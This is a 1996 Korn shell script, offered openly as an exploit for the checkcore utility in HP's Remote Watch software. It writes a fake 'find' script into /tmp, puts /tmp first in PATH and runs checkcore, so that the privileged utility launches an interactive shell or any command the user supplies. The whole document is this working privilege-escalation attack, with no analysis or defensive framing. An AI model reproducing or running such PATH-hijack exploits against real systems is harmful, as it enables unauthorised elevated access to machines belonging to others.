#!/bin/ksh # SOD (as of 06/11/96) # same sorta bug, different file. if [ ! -x /usr/remwatch/bin/fmon/checkcore ] then echo This is an exploit for the checkcore utility internal to echo HP\'s Remote Watch series of programs. echo The checkcore utility doesn\'t appear to be on your system. echo Moo exit fi PGM=$* if [ -z "${PGM}" ] then PROGGIE=`basename $0` echo "${PROGGIE}: I will run a shell for you" PGM="/bin/ksh -i" fi TTY=`tty` echo '#!/bin/ksh' > /tmp/find echo "${PGM} >> ${TTY} 2>&1" >> /tmp/find chmod 777 /tmp/find PATH=/tmp:$PATH export PATH /usr/remwatch/bin/fmon/checkcore > /dev/null 2>&1 rm /tmp/find